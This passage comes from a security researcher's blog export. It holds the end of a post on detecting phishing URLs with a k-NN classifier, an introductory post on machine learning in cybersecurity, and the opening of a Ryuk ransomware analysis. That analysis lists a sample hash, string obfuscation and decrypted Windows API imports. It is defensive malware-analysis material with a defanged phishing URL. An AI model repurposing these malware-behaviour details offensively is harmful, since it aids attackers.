1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">...</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">...</td><td style="border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 14px; line-height: 1.3; list-style: none; margin: 0px; outline: 0px; padding: 10px; vertical-align: top;">...</td></tr>
</tbody></table>
Then, we perform a data exploratory analysis.</div>
<div>
<img src="https://s.dou.ua/storage-files/image9_8dnmLA7.png" /></div>
<div>
<br /></div>
<div style="text-align: center;">
<i>Figure 1. </i>The charts showing the frequency of occurrence of the values of three attributes: a) registrar name (Registrar), b) domain registration period (Lifetime), c) geolocation of the hosting server (Countries) for phishing and benign URLs.</div>
<div>
<br /></div>
<div>
<div>
After a preliminary data analysis, we see that the <i>Registrar</i> and <i>Country</i> attributes will be difficult to use for classification since there are many coincidences among the most common values. Differences in these two attributes are more subtle and can be revealed in larger datasets. However, the Lifetime attribute corresponding to the period for which the domain is registered shows that among phishing links there is a tendency to register domains for a shorter period. For example, 37% of phishing domains were registered for 1 year in contrast to benign domains, which are usually registered for a longer period - 10 years and more.</div>
<div>
<br /></div>
<div>
As for TLS, the overwhelming majority of phishing links (96%) do not use the HTTPS protocol. Therefore, this is one of the essential criteria that can be used to detect phishing attacks. For HTTPS URLs, you can additionally analyze the certificate based on its attributes. For instance, what certificate authority (CA) issued that certificate and to whom, the registration address of the company to which the certificate was issued. Hackers can register certificates for fake companies, as it happened with the LockerGoga ransomware, whose files were signed with digital certificates issued by Sectigo RSA Code Signing CA to the fake companies Alina Ltd, Kitty’s Ltd., Mikl Limited and AB Simba Limited. I recommend reading <a href="https://medium.com/@chroniclesec/abusing-code-signing-for-profit-ef80a37b50f4">the Chronicle study</a> on this matter.</div>
<div>
<br /></div>
<div>
When preparing a dataset, we need to translate all string values into categorical ones and encode them with numerical values. The simplest way is to use an ordinal number for the category to represent its values in a numerical space. For example, for the categorical attribute <i>Country</i>, we create a new numerical attribute <i>Country_code</i> with the ordinal number of a country found in the dataset (1 - Australia, 2 - Bangladesh, 3 - Canada, ..., 28 - USA).</div>
</div>
<div>
<br /></div>
<div>
<img src="https://s.dou.ua/storage-files/Untitled-3_wzN1Yk4.png" /></div>
<div style="text-align: center;">
<i>Figure 2. </i>Distribution of phishing (orange dots) and benign (blue dots) links depending on the registration period (lifetime), geolocation (Country_code) and network protocol type (Protocol_code: {0 - http, 1 - https}).</div>
<div>
<i><br /></i></div>
<div>
<div>
The figure shows several trends in the distribution of data:</div>
<div>
<ul style="text-align: left;">
<li>A large number (47% of phishing and 53% benign) IP addresses are located in the US (Country_code = 28).</li>
<li>The vast majority of phishing links (96%) use HTTP, while all benign links use encrypted communication (HTTPS).</li>
<li>The registration period for phishing domains is generally substantially shorter than for benign ones. In a larger dataset, this trend will be better expressed and will tend to one year.</li>
</ul>
</div>
<div>
Now, we’ll apply the k-nearest neighbors algorithm (k-NN) for links classification. The algorithm assigns a class which is the most common among the k-neighbors of this object, the classes of which are already known.</div>
<div>
<br /></div>
<div>
But before, we need to train our model and then draw a <i>decision boundary </i>of the classifier. If the new link falls into the blue zone, then it will be classified as benign, if in the orange - as a phishing one. The accuracy of the classifier will be the higher, the more marked links the training dataset contains. In addition, you can experiment with model parameters, such as the number of nearest neighbors, weight function, the algorithm for finding nearest neighbors, and others.</div>
</div>
<div>
<img src="https://s.dou.ua/storage-files/Untitled-2_9R8pjG7.png" /></div>
<div style="text-align: center;">
<i>Figure 3. </i>The binary classifier based on the k-NN algorithm. Parameters: the number of neighbors <i>k</i> = 5; weight functions: on the left - <i>uniform</i> (all points in each neighborhood have the same weight) and on the right - <i>distance </i>(closer neighbors of the query point will have a greater impact than neighbors that are farther).</div>
<div>
<br /></div>
<div>
<div>
Then, we can use the trained classifier to detect phishing links. For example, </div>
<blockquote class="tr_bq">
<i><span style="color: red;">hxxps://www.ebay.com.items-checkout.us/item=2328358263481rt=nctrksid=p2328358263481/ </span></i></blockquote>
<div>
(source: <a href="http://phishtank.org/phish_detail.php?phish_id=6362700">Phishtank</a>) - a URL leading to a fake eBay webpage with the following attributes: </div>
<div>
<ul style="text-align: left;">
<li>the domain registered for 1 year (27.01 .2019 - 01.27.2020), </li>
<li>the server is located in the USA, HTTPS is enabled, </li>
<li>the registrar is NameCheap, Inc. </li>
</ul>
</div>
<div>
will be detected by our classifier as phishing. But if the domain was registered not for 1 year, but for 3, then our classifier would determine it as benign.</div>
<div>
<br /></div>
<div>
To evaluate the classifier, it is necessary to carry out <a href="https://en.wikipedia.org/wiki/Cross-validation_(statistics)">cross-validation</a> on a test dataset with known classes. The test result will show us the classification errors such as false positives and false negatives. In particular, the following basic metrics can be used to evaluate the classifier:</div>
<div>
<ul style="text-align: left;">
<li>True positive (TP) - the number of phishing links identified as phishing;</li>
<li>True negative (TN) - the number of benign links identified as benign;</li>
<li>False positive (FP) - the number of benign links identified as phishing;</li>
<li>False negative (FN) - the number of phishing links identified as benign.</li>
</ul>
</div>
</div>
<div>
<div>
And derivatives from them:</div>
<div>
<ul style="text-align: left;">
<li>True positive rate (TPR) or Recall = TP / (TP + FN);</li>
<li>True negative rate (TNR) = TN / (TN + FP);</li>
<li>False positive rate (FPR) = FP / (FP + TN);</li>
<li>False negative rate (FNR) = FN / (FN + TP);</li>
<li>Precision or Positive predictive value (PPV) = TP / (TP + FP);</li>
<li>Negative predictive value (NPV) = TN / (TN + FN);</li>
<li>Accuracy = (TP+TN) / (P+N) = (TP + TN) / (TP + TN + FP + FN);</li>
<li>F-measure - harmonic mean between Recall (TPR) and Precision (PPV) = 2 * Precision * Recall / (Precision + Recall).</li>
</ul>
</div>
<div>
In the context of detecting cyber attacks, the most important is the FN / FNR metric, which quantifies the missed attacks.</div>
<div>
<br />
If you want to play with the model, the source code is available on <a href="https://github.com/AlexanderAda/NioGuardSecurityLab/tree/master/Courses/ML%20in%20Cybersecurity/Classification/Phishing%20detection">Github</a>.<br />
<br /></div>
<div>
In <a href="https://www.nioguard.com/2020/03/ai-and-cybersecurity-part-3.html">the next post</a>, we'll consider the visualization problem and dimensionality reduction.</div>
<div>
<i>To be continued...</i></div>
</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-48891810687284705672020-03-14T12:01:00.001-07:002020-03-16T14:22:14.430-07:00AI and Cybersecurity. Part 1 - Intro<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Fys0kKPgcjIuGPUfwlYVbrpPzVmNcoaIc2hOEdaXidEo40XWZmOqyGWoSbu4Jxfh2CvFPu-mV4M91CzIjElOxX4TMaM1Vyqk2kba9pETFsRVCnOHD0FNY60Wzy28Oq8-UC14xIrUQ9hi/s1600/AI_ML.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="819" data-original-width="1024" height="508" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Fys0kKPgcjIuGPUfwlYVbrpPzVmNcoaIc2hOEdaXidEo40XWZmOqyGWoSbu4Jxfh2CvFPu-mV4M91CzIjElOxX4TMaM1Vyqk2kba9pETFsRVCnOHD0FNY60Wzy28Oq8-UC14xIrUQ9hi/s640/AI_ML.jpg" width="640" /></a></h2>
<div style="text-align: right;">
Image via <a href="https://www.vpnsrus.com/">www.vpnsrus.com</a></div>
<div>
<i>[Author: Alexander Adamov]</i><br />
<b><br /></b>
<b>Foreword</b><br />
I have spent almost all my professional life working in the antivirus industry detecting and analyzing malware. Around ten years ago, when the malware flow had increased so much that my colleagues and I did not have enough resources to analyze them all, we started thinking about automating our efforts. How to make a machine that autonomously detects and analyzes malware and phishing URLs day and night, writes and publishes reports? As a result, we managed to create a robot (what we call now 'malware sandbox') from scratch to automate most of the processes in the malware laboratory with the help of His Majesty Artificial Intelligence (AI). Since that, we accumulated a bunch of use cases for cyberattacks detection, malware analysis, and security testing with ML that can be useful for cybersecurity professionals that decided to leverage ML for cyberdefense. I'm going to share this knowledge in the series of blog posts that will eventually become a part of a new university course '<i>ML in Cybersecurity' </i>that I plan to make open-source. I also welcome cybersecurity experts and data scientists to contribute and help universities adopting the course.<br />
<br />
<a name='more'></a>Today, we start with the main paradigms of AI and, in the next post, we'll consider an example of detecting phishing URLs using classification methods and cluster analysis. But first, I would like to invite you to join a brief tour of AI history to understand its basic concepts.<br />
<br />
<b>Diverse AI. History tour</b><br />
The term “Artificial Intelligence” (AI) was first used by John McCarthy (Dartmouth College), Marvin Minsky (Harvard University), Nathaniel Rochester (IBM) and Claude Shannon (Bell Telephone Laboratories) in 1956. Since then, the definition of AI has repeatedly changed depending on the level of development of information technology. Therefore, it is usually interpreted depending on the context and level of technology maturity. Such definitions are called AI paradigms, and the process of changing them is called the AI paradigm shift. For example, David Auerbach <a href="https://thenewcentre.org/seminars/paradigms-artificial-intelligence/">identifies</a> five AI paradigms:<br />
<ul style="text-align: left;">
<li>Speculative (until 1940).</li>
<li>Cybernetic (1940–1955).</li>
<li>Symbolic AI (1955–1985), AI winter (1974–80).</li>
<li>Subsymbolic AI (1985–2010), 2nd AI winter (1987–1993).</li>
<li>Deep Learning (2010 —...).</li>
</ul>
<div>
To verify this, just search the terms Artificial Intelligence (AI), Machine Learning (ML) and Data Mining, and you will get a lot of Euler diagrams showing the relationships between these scientific areas but all different :)<br />
<br /></div>
<img height="294" src="https://s.dou.ua/storage-files/Untitled-1_k3WsuI9.png" width="640" /><br />
<div style="text-align: center;">
<img height="291" src="https://s.dou.ua/storage-files/image4_Hc2saPA.png" width="400" /></div>
<i>Figure 1. A variety of existing relationships between Artificial Intelligence, Machine Learning, Data Mining, and Statistics shown with Euler diagrams. Image Sources: <span style="background-color: white; border: 0px; color: #0d0d0d; font-family: "pt sans" , "arial" , sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><a href="https://medium.com/@divyacyclitics15/understanding-different-components-roles-in-data-science-5e6cb4b4fe23" style="border: 0px; color: #f93703; cursor: pointer; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;" target="_blank">1</a>, <a href="https://www.analyticsvidhya.com/blog/2015/07/difference-machine-learning-statistical-modeling/" style="border: 0px; color: #9c30b6; cursor: pointer; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;" target="_blank">2</a>, <a href="https://towardsdatascience.com/artificial-intelligence-in-procurement-supply-chain-d37875e76e62" style="border: 0px; color: #9c30b6; cursor: pointer; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;" target="_blank">3</a></span></i><br />
<br />
Ron Schmelzer (Managing Partner & Principal Analyst at AI Focused Research and Advisory firm Cognilytica), in his Forbes <a href="https://www.forbes.com/sites/cognitiveworld/2019/11/21/is-machine-learning-really-ai/">article</a>, argues that there are two polar opinions.<br />
<br />
According to one, only Artificial General Intelligence (AGI - general, full or strong AI), which has the same cognitive abilities as a human, can be called a real AI; and only those ML algorithms that serve the purpose of AGI can be honorably called AI. This position is peculiar to the paradigms of the middle of the XX century.<br />
<br />
In 1950, Alan Turing in his famous work <a href="https://www.csee.umbc.edu/courses/471/papers/turing.pdf">Computing Machinery and Intelligence</a> proposed a test to answer the question "can the machine think?". The essence of the test, which was called the Imitation Game, was in asking questions to a human and machine one by one and trying to figure out by their answers who are you communicating with at the moment. His AI convention was: "If a machine acts as reasonably as a human, then it is as intelligent as a human."<br />
<br />
Steve Wozniak subsequently proposed his own version of the test called Coffee, the essence of which was that a machine (robot), entering an unfamiliar American house, could find all the necessary ingredients and devices to make a coffee :)<br />
<br />
Seven years later, in 1957, Frank Rosenblatt created the first Perceptron (the simplest artificial neural network), giving the U.S. military the hope of creating a machine that can walk, talk, see, write, reproduce itself and be aware of its existence.<br />
<br />
To date, the described concepts are rather similar to the scripts for the series “Black Mirror” and are still far from reality.<br />
<br />
Another, more practical position was taken by scientists engaged in applied research in the field of AI (Applied AI). Within this paradigm, ML is a subset of AI. AI can be defined as an algorithm that finds a pattern in the input data or makes its assessment. In the future, the algorithm uses the results to make decisions, as if it were a human. We will consider the problem of detecting and blocking cyberattacks in spite of Applied AI.<br />
<br />
<div style="text-align: center;">
<img height="144" src="https://s.dou.ua/storage-files/image7_a1oYhi7.png" width="400" /></div>
<i>Figure 2. The Euler diagrams illustrating the difference in the paradigms of General AI (left) and Applied AI </i><i>(right).</i><br />
<br />
<b>Cyberattacks well-known and not very</b><br />
<br />
Two approaches are traditionally distinguished for identifying cyberattacks: deterministic and probabilistic. The first one usually takes advantage of using signatures - unique byte sequences that describe malicious objects (files, processes, network connections, keys in a Windows registry, synchronization kernel objects) that allow a defender to uniquely identify known cyberattacks in the automatic mode.<br />
<br />
The second approach is mainly used to block unknown threats or zero-day threats within targeted attacks when we do not know the indicators of compromise in advance. As the name implies, this approach enables the identification of new cyberattacks with some probability, leaving the last word to a user or cybersecurity expert. The probabilistic approach opens up a wide field for the use of AI with ML.<br />
<br />
<b>Machine learning triad</b><br />
<br />
Commonly, ML has three main approaches:<br />
<ol style="text-align: left;">
<li><b>Supervised learning</b> that can be used for:</li>
<ul>
<li>Classification and recognition;</li>
<li>Pattern recognition</li>
<li>Supervised anomaly detection</li>
<li>Forecasting (regression analysis)</li>
</ul>
<li><b>Unsupervised learning</b></li>
<ul>
<li>Clustering</li>
<li>Pattern recognition</li>
<li>Unsupervised anomaly detection</li>
</ul>
<li><b>Reinforcement learning</b></li>
<ul>
<li>Robot control</li>
<li>Game theory - algorithms for Go (AlphaGo), chess (AlphaZero), checkers, online strategic games. AI initially knows only the rules of the game and creates algorithms and strategies while playing with other instances of itself.</li>
</ul>
</ol>
There are two more hybrid approaches:<br />
<ol style="text-align: left;">
<li><b>Semi-supervised learning</b> - training with the input data that can be either labeled or not containing a class label.</li>
<li><b>Self-supervised learning</b>. The class labels are already present in the input data. For example, for an existing set of images, we generate new images by rotating it by 90, 180, or 270 degrees. The task of the model is to learn how to turn the rotated images to their original position. Another example is picking up a puzzle after cutting the image into pieces. In both tasks, we know the desired result and teach the model to find it.</li>
</ol>
<br />
<b>Supervised a</b><b>ttack detection</b><br />
The most popular task in the field of cybersecurity is binary classification, i.e. dividing objects into malicious and benign in order to detect and block cyber attacks. This implies that, in addition to the classes themselves, we already know the criteria by which we attribute the objects. To develop these criteria, we must have knowledge of the threat. In other words, classification methods allow you to identify known types of threats and attack vectors but do not allow you to identify a new cyberattack that does not use traditional techniques and does not contain indicators known to us.<br />
<br />
In addition, the creation of a binary classifier is fraught with a number of problems such as the lack of labeled data and adequate feature extraction.<br />
<br />
<b>The lack of labeled data</b><br />
The first problem is the lack of a large amount of classified data that already has a label (e.g. an object is malicious or benign, it is an indicator of attack or normal activity) that could be suitable for supervised training.<br />
<br />
For example, to train a neural network to distinguish cats from dogs, you must first provide labeled images. Such marking is usually done manually and it will be difficult to do this on large amounts of data. If we talk about cats and dogs, then, fortunately, we can use <a href="https://www.kaggle.com/c/dogs-vs-cats/data">datasets from Kaggle</a> already exist, containing 25,000 classified images. You can also use CAPTCHA so that users categorize images when passing a test that identifies Internet crawlers.<br />
<br />
<div style="text-align: center;">
<img height="400" src="https://s.dou.ua/storage-files/image6_fsDbrLC.png" width="221" /></div>
<div style="text-align: center;">
<span style="text-align: left;"><i>"To prove that you are not a robot, select the pictures that show the shelters in which you would hide during the rise of machines"</i></span></div>
<br />
However, both of these options do not work when it comes to cyberattacks. First, cyberattack techniques evolve faster than cats and dogs, so the model must be regularly trained on new attack patterns. Secondly, ordinary users cannot be involved in the classification of cyber threats due to the non-triviality of this action.<br />
<br />
In <a href="https://www.nioguard.com/2020/03/ai-and-cybersecurity-part-2.html">the next post</a>, we'll create a basic classifier to detect phishing URLs.</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-48477269788370029512019-12-09T03:55:00.001-08:002019-12-09T04:18:16.278-08:00Analysis of Ryuk Ransomware<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<img src="https://lh6.googleusercontent.com/u9h-ASzldENTiVYdi6QYucVtjdmra3KNDNCUjvrHAdzRV4e5nG8fp4fH0jgEJvSbP75c8PYXWftBtoo7FfP96HMM6S6e2IvbTd6Os5V73XNHJdr4_1cCDM4LdUH23ZGzcCUaBi9Q" style="font-family: Arial; font-size: 20pt; margin-left: 0px; margin-top: 0px; white-space: pre-wrap;" /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<i style="background-color: white; font-family: "trebuchet ms", trebuchet, verdana, sans-serif; font-size: 13.2px;"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">[Authors: </span><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre;">Viktoria Taran, Alexander Adamov</span><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">]</span></i></div>
<div>
<i style="background-color: white; font-family: "trebuchet ms", trebuchet, verdana, sans-serif; font-size: 13.2px;"><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;"><br /></span></i></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">The Ryuk ransomware seen for the first time in August 2018 has been successfully used in targeted attacks encrypting data and asking for a ransom payment which differs from 10 BC to 50 BC. The recent attack was executed against </span><a href="https://www.bleepingcomputer.com/news/security/dch-hospital-pays-ryuk-ransomware-for-decryption-key/" style="text-decoration-line: none;"><span style="background-color: white; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">DCH hospitals in Alabama</span></a><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> on October 1st, 2019. As a result, DCH paid the ransom to recover the data stored on their servers. In this report, we analyze one of the recent versions of Ryuk ransomware discovering the installation process, networking details, and encryption model.</span><br />
<a name='more'></a><br />
<span style="font-family: "arial"; font-size: 20pt; white-space: pre;"></span></div>
<h3 style="background-color: white; line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; padding: 0pt 0pt 12.75pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre;">Static Analysis</span></h3>
The ransomware file is PE32 executable for MS Windows. It is 1232896 bytes in size. The ransomware code is written and compiled in Microsoft Visual C++. According to the compilation timestamp, the binary was created on September 2nd, 2019.<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Company information:<br />
<img height="199" src="https://lh6.googleusercontent.com/E08sqppHtKkwlzss23ykr93J1_F_v_XNVI_6xY4KZGk64clua2rWMNNqyPY99xoEAPCtnBVrWcizv7CUDzMCVwZMSq3bXiuyqlJuKnQzNpKvBvGl7w4fwGe3DweWW9Qgehxt7Qli" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="378" /></div>
<b style="font-weight: normal;"><br /></b>
<br />
SHA-256: dd0691992d947366f1b9caf2acc1fec951f761a39ca3863e81bc2c3fb5efd415<br />
<h3 style="background-color: white; line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; padding: 0pt 0pt 12.75pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Obfuscation</span></h3>
Ryuk has encrypted strings hardcoded that contains encrypted Import Address Table.<br />
<div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 125px; overflow: hidden; width: 630px;"><img height="125" src="https://lh4.googleusercontent.com/GzeQUNdOkuj6SO9O_eOevCFGPCrl9aQO8Ducfc7AEOPhy-i0ZOXJW78B8ArbFpxvJj17rwDbjan-acxqh--Wx4NudTbXT8RNAd51-j7iS_yfCAzhocqwlPh-Ol60CE0UX4H4kF4m" style="margin-left: 0px; margin-top: 0px;" width="630" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
Decrypted strings:<span id="docs-internal-guid-33c87619-7fff-5cc0-fb73-057cf61b2266"><br /></span>
<br />
<div align="left" dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; table-layout: fixed; width: 517.5pt;"><colgroup><col></col><col></col><col></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">LoadLibraryA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">VirtualFree</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">FindFirstFileW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">FindNextFileW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetModuleFileNameA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CreateFileA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Wow64RevertWow64FsRedirection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SetFilePointer</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ShellExecuteW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">VirtualAlloc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CloseHandle</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetWindowsDirectoryW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CreateDirectoryW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CreateFileW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">WriteFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CreateProcessW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetModuleHandleA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CreateProcessA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CopyFileA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetCommandLineW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">FreeLibrary</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GlobalAlloc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetModuleFileNameW</span></div>
</td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CoInitialize</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Wow64DisableWow64FsRedirection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SetFileAttributesA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CopyFileW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">DeleteFileW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
